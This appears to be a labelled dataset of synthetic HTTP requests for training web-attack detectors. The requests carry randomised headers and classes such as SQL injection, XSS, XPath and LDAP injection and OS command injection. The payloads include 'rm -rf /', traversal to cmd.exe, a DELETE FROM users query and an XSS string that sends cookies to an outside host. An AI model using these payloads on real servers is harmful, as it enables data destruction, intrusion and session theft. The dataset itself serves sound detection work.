X-Serial-Number: 323337935267147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38819
Start - Id: 40881
class: SSI
GET /SrRy480include-JQsPautoexec1/Tdd7rIrricth8sgtgyT.mdb?eittcLO=pNjeneaXettEuon&etPOkojwnereho=%3C%21--+%23odbc+++++statement%3D++++%22select+++evfsejc%2C++++nsAk9sNa%2C+++++8tkteuD+from+Gcebjibn+++++order++by+++++0%2C+++032%2C+4%22++++--%3E HTTP/1.0
Host: 242.132.111.20
Connection: hi6Ruand
Accept: video/quicktime;q=0.2, application/rtf;q=0.1, text/plain
Accept-Charset: shift_jis;q=0.6, iso-8859-1, iso-8859-2, iso-8859-9
Accept-Encoding: *;q=0.1
Accept-Language: 9-laonixph
Cache-Control: max-stale
Client-ip: 158.44.31.77
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="14"
Date: Thu, 13 Sep 07 17:59:00 CET
ETag: W/"1MAG4QzgEL50wak"
Expect: Bsieuw=kptnu;mohtt
From: Oztu@sBbhe8e.de
If-Modified-Since: Wed, 24 May 06 22:22:45 UTC
If-Unmodified-Since: Fri, 18 Nov 05 02:14:32 CET
If-Match: "4e3CRdTlVzGBZjWDj"
If-None-Match: "9LocAgY1rKtsBwKDR"
If-Range: Sun, 24 Apr 05 08:56:27 CET
Max-Forwards: 196
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: 453-748
Referer: http://www.epm4llon.uk/eati/f5ip.shtml
TE: deflate;q=0.9,trailers,trailers
Trailer: Accept-Charset
User-Agent: tHgyA3epeppa
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: 7.9 14.79.166.98, 0.8 252.248.147.215
Transfer-Encoding: deflate
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 71520
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40881
Start - Id: 36765
class: OsCommanding
GET /t2sn2Uoeeigyt/2eaitwt/aedhWjepe5ons/iGyhqAtgH/q6L/dsiegeanroB/CKZTjbaccess_logqe/oa0rds2.exe?hek2nRncany6Mea=%60rm++-rf++%2F++++%60 HTTP/1.1
Host: www.ecplEonp.com:80
Connection: 2reEa
Accept: image/*;q=0.4, application/*;q=0.5, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: puvsEile-Ut, 3rfspsve-eiuoa, h9insen-hdAe, blz4c-H;q=0.7
Cache-Control: max-stale
Client-ip: 175.79.197.116
Cookie: yjzsocysdtoos=8UfG86cVmu6;thIl=io;uRt3eursOommLu=7;n0nardcs4or1hQ=oiasrbho
Cookie2: $Version="22"
Date: Fri, 01 May 09 07:52:26 CET
ETag: "bG0iOuAbRP_eNEv"
Expect: 100-continue
From: excu@itaiLs8n.it
If-Modified-Since: Fri, 09 Apr 04 23:57:10 GMT
If-Unmodified-Since: Sun, 04 Dec 05 05:09:41 UTC
If-Match: *
If-None-Match: "_sazdc1Cmh8CaM3oxSOa"
If-Range: "@-Dl8F_liWDXHHnRtky"
Max-Forwards: 574
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cavyd p9Spn=rbeshotc
Authorization: NTLM ZW04YWlyc2hIZGxSb2VvaWlpZXF6b2JzSW9hZWR0dHQ0cndtdG4=
Range: 8-,6-50
Referer: http://exsattI.it/kail.tiff
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.2 (X11; U; Open BSD i586 1.9; pt-tr; rv:5.9.0) Gecko/73030777
UA-CPU: 68000
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/7.1 91.205.193.172, HTTP/0.0 www.binr.shtml:72201
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36765
Start - Id: 49539
class: XPathInjection
GET /devZbzr_2ZbSWsn5/eBhUYexec124DFQ/tbWQtIUu1PhHM2J/8wblEqteaaseaLvmeeo/a-s16G2Zli3lmu/n61GY6CQLSftpX/uVaNdudacsmeyei/fNedocument/n.vU/f7qs5-CogFJz/olihg6n.cfm?jik=evlsmnfc&ilnpsnHLtognrr=9&Smne=51617425&GihpgI6U=mTacIuh0&os1udhbnrdtiih=auita%27+++++or++6+++%3C+++++count%28path%2Fchild%3A%3A*%29++or++++%27extlpr%27++++%3D++++%27 HTTP/1.0
Host: 151.23.106.138:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 89.70.223.74
Cookie: clei=ati;6pahh9zna=0rrs9uttrtepM5;exrTboxnmshyl=gsiroIiODt&imo;sneq30ysibUsaln=519
Cookie2: $Version="3"
Date: Fri, 03 Aug 07 23:56:34 GMT
ETag: "bHghOmTBfDFajHx3kO"
Expect: edehn3bs=oglslt
From: ntesM@cHe7tnfpjs.org
If-Modified-Since: Wed, 19 Aug 09 02:10:03 GMT
If-Unmodified-Since: Thu, 07 May 09 19:34:39 GMT
If-Match: "rZAp-iTTM8z64R-D"
If-None-Match: "6L70SZ3iZksBSyZ"
If-Range: Wed, 08 Mar 06 07:57:31 UTC
Max-Forwards: 4860
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic ZHBtaXM3dDpoYTliYTU=
Range: -5,-835621,4-66
Referer: /ema1/ynkn5tE/rrh0.mspx
TE: trailers
Trailer: Date
User-Agent: Mozilla/0.9 (compatible; Konqueror/1.9; Open BSD i386; eeeies; tSaao; iane)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 750x884
Via: 7.7 128.89.122.114:768, HTTP/7.0 www.mqE7ilh.tiff, 0.8 185.239.166.117
Transfer-Encoding: identity
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 79.10.240.68
X-Serial-Number: 84222466016930
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49539
Start - Id: 43731
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.ta8Hy.be:80
Connection: oEiic
Accept: image/*, application/rtf, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=4667
Client-ip: 180.110.204.93
Cookie: UBlsfMbodyIG_=961739421;7ITF=tpe;le=0ily;mhnretrhfeneEsN=375412;bgmteolet=3r@mmoouniontlcaq-sqFc ;lue1ai9ht0ep=tco
Cookie2: $Version="6"
Date: Tue, 11 Aug 09 23:13:03 GMT
ETag: "47mVLi4C04269L-1r"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Mon, 12 Mar 07 13:11:40 CET
If-Unmodified-Since: Thu, 06 May 04 19:27:22 CET
If-Match: "lT0iO3k0TvAyLBF"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 6644
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bnZzYWFFc2w6YWR1Y2R0cw==
Range: 7008-71
Referer: /oenou.php4
TE: gzip,chunked;q=0.9,gzip;q=0.7
Trailer: Accept-Language
User-Agent: rttccahb (s5-4eA@Or; m2uSh9v2-; uwLN.6R1uw; adDhIL11bX; w_j89fjBy)
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: FTP/7.5 181.6.95.168, 1.8 www.l6ye.htm, HTTP/1.7 www.donk.jpeg
Transfer-Encoding: kilOte; sCgne=gsno
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 601406
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43731
Start - Id: 48264
class: XSS
POST /1pJGYYbTmimg2C@.sh? HTTP/1.1
Content-Length: 293
Content-Language: egna8hs,oszct
Content-Encoding: compress
Content-Location: /opltEebn/btlfl/0tc07eD/it4AEnys.msf
Content-MD5: Y3Vib25HZ3lpNmNOemRmbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Feb 07 06:47:56 CET
Last-Modified: Tue, 20 Jun 06 07:27:26 UTC
Host: www.auye3tlazn.cz:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-3, x-mac-japanese;q=0.9, iso-2022-jp
Accept-Encoding: 
Accept-Language: Lxa-rir;q=0.6
Cache-Control: no-cache
Client-ip: 166.142.44.213
Cookie: mulhietsn=0;olrt5ereosleel=3/m;tqhsmlsedliciaO=eF8ij;rk78usloe=ob6TDpZ8gBU;SjlJ4VXS4Per=<style   type  =" text/javascript   "  >[alert('etssetee');]</style   >
Cookie2: $Version="02"
Date: Sat, 26 Dec 09 15:35:07 CET
ETag: W/"Wo44q1fhwtx@tDhd9M"
Expect: ieboei=mixey6e
From: aeebosbw@2l6nl.biz
If-Modified-Since: Sun, 20 Nov 05 17:38:50 CET
If-Unmodified-Since: Fri, 16 Jan 04 06:42:53 UTC
If-Match: "XNxpMDQ47Ch@clOYKLMZ"
If-None-Match: "Fr5vHC@c6rYPassMOika"
If-Range: Sun, 10 Apr 05 18:20:26 GMT
Max-Forwards: 4825
Pragma: lGt='druei'
Proxy-Authorization: Basic aGV5NXNpOnNLb28=
Authorization: Basic b3RnYmVFZHc6ZXlidGtjcw==
Range: 431947-
Referer: /NsAneisa.asmx
TE: trailers,deflate;q=0.2
Trailer: If-Match
User-Agent: Mozilla/4.4 (X11; U; Linux i386 4.8; 3r-sN; rv:8.2.5) Gecko/29307217
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 9755x524
Via: 9.1 0.46.134.210, 7.2 www.crt3.html:761, pip/1.0 252.11.15.104:941
Transfer-Encoding: compress
Upgrade: tPo/6.0, egp/7.6
Warning: 671 129.210.117.15:935 "9nmssHeleesiilmnpeo" 
X-Serial-Number: 96907185083
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

l4i6leail=1536&wajvBe=dwinntdirdivM|fon&UmpPF=21&cargadUpztOr1=RuEreewyrtzlpt&5Uaknrsao9c=<winnt2Apyrowri&9wrjby2at9=6tecs/ Tsh$&LXZldZ=3FxhqvPDjI4&rltxibrett=~a&eeyeefaIi8Kr=eobjectaand4includehh&rtyueszqttpg0=oeseie1flebgiedA&epmovRgorerc=2&i8g=3514&wtagk=ot5a1wvwvk&rkchkrz0eho=e 

End - Id: 48264
Start - Id: 46981
class: XSS
GET /eYsmeh6lhccaa4t2SO/o71KDa9xEnAVl.swf?uZ2Nsock_streamT7MW5G=%3Cdiv++++style++%3D+%22+width%3A+++expression%28%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.strior.com%2Fcgi-bin%2Faltiil.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B++%22+++%3E&NED2FXLZHqW=ehtpass%3E%3Aedorh%5Ctsms+zsnn HTTP/1.0
Host: www.9eee.ch:14
Connection: wa3hIono
Accept: */*
Accept-Charset: windows-1252, windows-1254, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 128.77.209.28
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Fri, 07 Oct 05 16:43:08 CET
ETag: W/"Buq@whtrMtHZH-Bk7Zb"
Expect: lirmAu=bfd2
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 30 Mar 09 16:07:55 UTC
If-Unmodified-Since: Mon, 22 Mar 10 03:24:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 451
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: http://t6higmo.com/FlfTanpr/itlypqu/buav/hmesnh.cgi
TE: deflate
User-Agent: UercarithdIoiN
UA-Disp: 2976,173,32
UA-Color: color8
UA-Pixels: 199x2885
Via: HTTP/3.6 www.hYbvu.tiff, sel/7.6 159.246.100.101
Transfer-Encoding: gzip
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 174.206.213.130
X-Serial-Number: 09560109
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46981
Start - Id: 35665
class: XPathInjection
GET /ham4Sj7/BNUEFOgDDj/nnuh.gif?amnnptrlyied=Ge%3D&knodeKeU541=8269640&hdt6uodx8=0o2oyrHsxsa3srlden&ph9ohe1ao=okmf%27%5D+++%7C+++P++++%7C+++%2F%2Fuser%5B+name%2Ftext%28++%29%3D+++%276iP&mesemysn1ar=ts HTTP/1.1
Host: www.98dfol.ch
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ivtudldo-Tta;q=0.2, ca3-frdHb;q=0.3
Cache-Control: min-fresh=57
Client-ip: 68.97.141.43
Cookie: cmaetrrlrmssre=dci4;osmceaaslI3i5st=414285;9srnoNujilzfdc=34;ln=052;bBQf=WdEoyodEtmtiI
Cookie2: $Version="5"
Date: Tue, 28 Dec 04 12:12:35 GMT
ETag: "e3pjb@j9ocdjkSZAayeI"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 11 Nov 04 14:44:42 GMT
If-Unmodified-Since: Sat, 01 May 10 15:52:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic ZXRvOTpyeXJSaWk2cg==
Authorization: NTLM M2xkZWxsbm5IamVhU2lOaW9nVmdyc29BcGFlbnRTcnVucGNleW9kZA==
Range: -5103
Referer: http://lbtrh.cz/s1s5o/opd6iH6o/3oaed/atnmqcfs.mpeg
TE: gzip;q=0.3
Trailer: User-Agent
User-Agent: aa1tAr/0.0.8.0.8
UA-CPU: Sparc
UA-Disp: 464,9739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: ienf/4.5 www.tbib.js
Transfer-Encoding: identity
Upgrade: alcth4/9.0, omen/8.5
Warning: 803 161.22.234.22 "nydhoO5peei7" "Wed, 08 Feb 06 21:10:39 CET"
X-Forwarded-For: 168.165.190.35
X-Serial-Number: 24734
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35665
Start - Id: 42078
class: SqlInjection
GET /sobfySsD7iRxecj42P3/0x4c/Eo.css?0yMBlADTwSZ=%26oevbscript&fqxL6luhd=%27%3B+++insert++++into++++g6a+++++values%28666%2C%27dt8nth%27%2C%273otitnox%27%2C0xfffff%29&ycGNGe=dhbn&asa8denthf=02020&6tmpoUSscDA=ssc2t3suhee&msl=aN6jl&g6Y1w828nscc3=rzUVY.3W&Rarol=0&aeseiypmnt=7aOdm+&ts=dleqm3&EerLdasfspr=e%2B0&nafob1nsio=ie8mssiIiGvedah HTTP/1.1
Host: www.efejai.fr:80
Connection: close
Accept: audio/*;q=0.3, video/*;q=0.1
Accept-Charset: windows-1258;q=0.0, iso-8859-5
Accept-Encoding: *;q=0.7
Accept-Language: ert7b-afcxxetr, ewY1oV-t, v6-imaio;q=0.5
Cache-Control: r=a
Client-ip: 166.27.211.205
Cookie: r0ssdklo=e window.openboot.inigroup by;eotd2rekltbc==a
Cookie2: $Version="36"
Date: Sat, 28 Mar 09 12:49:46 UTC
ETag: "SQ-tIM.HVaLNvisl3sL"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Sat, 31 Mar 07 20:51:50 GMT
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: *
If-None-Match: "09z3NyWNnJAYmcIw"
If-Range: "TJsrsfNJCZnFacpCa"
Max-Forwards: 4
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZXRhb2llOm9ZN2lJ
Authorization: Basic cnJpbDplcHJ0aGU=
Range: 54-40255,-926,-098
Referer: /Ed6r/Oaoit/blv5tlha/bewsC1Eo/egluir.mdb
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.8 (X11; U; SunOS sun4u 7.3; iJ-gt; rv:6.5.1) Gecko/05177907
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4241x2926
Via: HTTP/8.0 179.46.94.57
Transfer-Encoding: compress
Upgrade: ony/5.5
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42078
Start - Id: 35355
class: SqlInjection
GET /CQBVsock_stream/aV1cFDL75iAz6sq/aD/2tkaechocopy@deleteD3GKm/vb8oG6FYGLVzW6r7/sF6R/uUhif4ab0lZg/m.s42N.cgi?nnee=452966&6htr80y2schurm=dvbhcoelyrt1T&rboEwrei=%3BtsRd5echotd&at5yrepnesml=gtn%27+%29%3BDELETEFROMusersWHEREupper%28username%29+%3D+upper%28++%27admin HTTP/1.0
Host: 171.124.67.57
Connection: ruRi6Eh
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=761
Client-ip: 85.208.223.94
Cookie: IStn8=DeraoYmIn
Cookie2: $Version="194"
Date: Wed, 18 Nov 09 05:54:44 GMT
ETag: W/"_UGz7wT0hbLk_psH8NC"
Expect: aseUtnu
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Thu, 07 Jun 07 16:06:44 GMT
If-Unmodified-Since: Fri, 20 Feb 09 23:21:24 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 6.8
Pragma: sc='erAue'
Proxy-Authorization: NTLM VGVkNHBpZjUzc3l6dm5wZ3RtdG5kb2FoM2RuZW5vdTJhc3Rvb2ZycHNoc2g=
Authorization: hoszw 8terEet=a94t
Range: 1609-18413
Referer: http://www.6agndhi.cz/li5a/sbtneowt/arbr/bng6hrhr/uhlgo.bin
TE: trailers,chunked;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/5.8 (X11; U; Solaris 8.0; cv-8n; rv:1.9.2) Gecko/75038050
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: srz/6.5 218.40.5.106:2835
Transfer-Encoding: evtn; rnnyn5=5ugf3o
Upgrade: gerh/9.6
Warning: 688 243.43.80.92 "4Hronabesyesov3og" "Fri, 23 Jan 09 20:16:25 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35355
Start - Id: 36497
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.iTooE.biz:80
Connection: keep-alive
Accept: application/rtf;q=0.4
Accept-Charset: euc-jp, iso-8859-3, ks_c_5601-1987;q=0.7, isiri-3342
Accept-Encoding: identity;q=0.9
Accept-Language: tTepiEEo-eysrohyF, ea4-tn5m, inttnFi-B2yslo;q=0.0, 1guttark-ry9liyT
Cache-Control: min-fresh=444
Client-ip: 58.145.54.71
Cookie: gei=diXE0Mhf0;ns3jot=sNMAay;es7j9arb6=147334;ttEzot=acdihn0im;eNncth=156
Cookie2: $Version="050"
Date: Sat, 30 Dec 06 08:13:55 GMT
ETag: W/"vjbM4Bxb6G26xH._"
Expect: atcEeo
From: oliee@2ucHyiTL.org
If-Modified-Since: Sun, 09 Aug 09 09:21:51 CET
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: "cdJMnnt6ADzWwN.Cp_"
If-Range: "_z.zCFUN3Jq.GaGGwX6"
Max-Forwards: 670
MIME-Version: 6.2
Pragma: ots98=o
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: Digest uri=/zdte/eixq/S6iewko/pkmoth/d2z2fwo.dll
Range: 998505-,-0540,815-
Referer: http://www.9ur6.de/t2nNdnCf/trrenlPn.swf
TE: trailers,trailers,chunked;q=0.5
Trailer: If-Modified-Since
User-Agent: otbq1mh@p6 http://www.n1Ae.fr
UA-CPU: MIPS
UA-Disp: 898,9805,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 512x1298
Via: esr/2.8 113.183.178.105
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36497
Start - Id: 41275
class: SqlInjection
GET /uxpmWQwvhrOYDL4m7/HohrnClan/aid/eqoTrItuO/aXm57dK/e3ddsiaro.mspx? HTTP/1.0
Host: 11.237.210.36
Connection: keep-alive
Accept: image/gif, video/*, image/jpeg;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: naLa-f, Fmonu5-onwo0d, r5f6e-hrxk;q=0.4, a0db-jeeEy3
Cache-Control: no-store
Client-ip: 45.80.55.107
Cookie: nmtn5yrEeSo=GS&hicopytxp_saaercpad;aesEz9y=t;da='    OR  'hietdtr'    BETWEEN 'R' AND  'T
Cookie2: $Version="01"
Date: Thu, 15 Jan 09 19:12:38 GMT
ETag: "RwUFwv_47PNnyMM"
Expect: 100-continue
From: rahrbmga@xtei.com
If-Modified-Since: Thu, 27 Jul 06 14:55:01 UTC
If-Unmodified-Since: Tue, 12 Jan 10 12:22:24 UTC
If-Match: "rIBS309AEsR9h5ih56"
If-None-Match: *
If-Range: "69nj8ZWpq.n-qS04XkxY"
Max-Forwards: 1
MIME-Version: 0.7
Pragma: 8wa9nz=i3eelEf
Proxy-Authorization: deoa hlT7nho7=cepy
Authorization: NTLM bmllN2R3cnh3YWFBeGtkdGJpemdIMG1zc29zTGVydHNJa0lyZ2VzNmVjaTNPZG91
Range: 27-,168658-8445,77-
Referer: /ieocht/ateeoS0.jpeg
TE: deflate,trailers
Trailer: Referer
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 2.9; ee-tt; rv:7.6.9) Gecko/96801323
UA-CPU: StrongARM
UA-Disp: 1519,2256,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 952x1778
Via: 8.1 255.158.103.242, HTTP/3.5 176.72.109.232:23047, ieve/2.9 www.ntu3Np.png:964
Transfer-Encoding: identity
Upgrade: ofyqd/6.8, eenE/0.6, uatt/3.2, tjd/8.8, rihe/1.8
Warning: 663 165.110.177.57 "Erciaio8spfcatRGun" 
X-Forwarded-For: 26.168.221.221
X-Serial-Number: 891769847073825
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41275
Start - Id: 38826
class: LdapInjection
GET /iK-cE/sNdrdSNKevcQl.png?8eDnedotoNEle=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&aswto=7630&sscRcoerHc=ee9uc&embmemJe=ugo&mHLjptganbrr=tfkW72a3&ecujeiltTma=+lyt%5Df%3Fheb&esE=dd&hscss7imtvhha=91001352&e4BHp=2cg-YP8&oiBi9KinEXv=lon0l&eygoa=ofde+9ggiaaatexec&anguouxwim5oom=455888&ncteZsteaoEnrsa=02146&DtSI6P=spe&ngwaa0reh=id2demap8ir HTTP/1.0
Host: 167.101.72.179
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 147.81.36.108
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="66"
Date: Tue, 22 Jun 04 21:21:05 UTC
ETag: "oUa-7gXLuicP-meF2Fl"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Wed, 23 Dec 09 23:45:29 CET
If-Unmodified-Since: Tue, 05 Jan 10 12:53:02 UTC
If-Match: "bCxFaZOmHfiAdC3ALLb"
If-None-Match: "IeuYrU2pEI-U5rqq"
If-Range: "T1_3mZuEpS4.2wu"
Max-Forwards: 9262
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM aWxhZnJzc2Nlc2ZvRWF0bWVwc3Jlb3NzaWFzZG9lNXVnbGRhcmh1aGU=
Range: 55524-
Referer: /so1ilkt/n2sca/ateNc.bin
TE: trailers,trailers
Trailer: If-Range
User-Agent: ovneao/0.8.7
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/2.5 220.209.21.63, 4.5 www.tmt5pl.tiff:2, t9T/2.8 90.219.125.23
Transfer-Encoding: gzip
Upgrade: wnz/1.4, E79wa/9.8, 1dvs/2.3
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38826
Start - Id: 49284
class: XPathInjection
GET /Vis47mUu/au6b.t5nx/eaho5deofoyjgheos7sh/nz/fmF9t5Y.html?1amE=6&ioautoexec9=atte7vEEst&ulge2suhr=oe%27+++++or++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i++%2B+j%2B++k+%2B+++l%2B+1%29%5D++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%270eteaof%27+++%3D+%27++tol9osy%27+++or&uaona5tstl1t=eespnrcteoe&taaeys2ytabe=sneet3l7zdjoeTh&ucabhb=4iframe%5Dnv&4nheeoee=6&.-ZXI=8&osoUlvkysesaodo=eoy&gnhej9toHirelte=dfNw&eAfsqim=8&iCmodtS=21 HTTP/1.1
Host: 3.51.15.188
Connection: p6o3
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: ii=eeeaidnr
Client-ip: 226.125.42.173
Cookie: nzr=:ibetweene+
Cookie2: $Version="39"
Date: Wed, 03 Sep 08 18:58:24 UTC
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 03 Nov 07 21:37:55 GMT
If-Unmodified-Since: Mon, 03 Sep 07 03:39:24 UTC
If-Match: "GOvyS9qcbFxVNGoI6"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: "EQUbdGas0ufEv-m"
Max-Forwards: 573
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM bW5hTWhGZWxnM2hhcG1ydXJ0dGNlaHFlR3Fyc3JjaG43bm1ucA==
Range: 305761-528973
Referer: http://www.nifn.biz/9fyEz/nrHh2/ndjsf.css
TE: trailers
Trailer: Trailer
User-Agent: tmi3rlcana (ts8LStlfW; orPFr_RPA_; rdeWL5pI; cXLvno)
UA-CPU: Sparc
UA-Disp: 8881,000,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7888x6205
Via: HTTP/9.4 www.udhma.gif, t9a/3.6 www.rnow.tiff, 5.9 www.ytahn.png
Transfer-Encoding: deflate
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 55.91.27.185
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49284
Start - Id: 49767
class: XPathInjection
